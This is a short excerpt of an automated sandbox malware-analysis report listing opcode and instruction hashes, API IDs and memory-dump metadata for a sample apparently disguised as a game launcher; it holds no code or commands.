                                                                                                • Opcode ID: e9f131062be16f64818568312050a79b72a2c540823f88221c5b505092b5d6c2
                                                                                                • Instruction ID: 81a531936c30b853915b96277e3da26ccb83be8861cabc1aea0c4fc1702da980
                                                                                                • Opcode Fuzzy Hash: e9f131062be16f64818568312050a79b72a2c540823f88221c5b505092b5d6c2
                                                                                                • Instruction Fuzzy Hash: 4F011EB0D00218ABCF18EF69D8559AEBBFAFF48704B50852EE41597341DB74DA05CBD4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Offset: 03543000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_3_3543000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: __common_dcos_data
                                                                                                • String ID:
                                                                                                • API String ID: 1949606188-0
                                                                                                • Opcode ID: 16ed9ee01572862e038c6c1d3797bd00a384460dcb525a4e2d12ef068b478fcf
                                                                                                • Instruction ID: 95e54f3bca324e3da9c5b199a49ecb0dea5e48312d40ea180fd42336782aa742
                                                                                                • Opcode Fuzzy Hash: 16ed9ee01572862e038c6c1d3797bd00a384460dcb525a4e2d12ef068b478fcf
                                                                                                • Instruction Fuzzy Hash: 7D31C876A00310AFD724DF68D8A1A5AB3B5FF85714F5A046DE905DF360D730BA01C780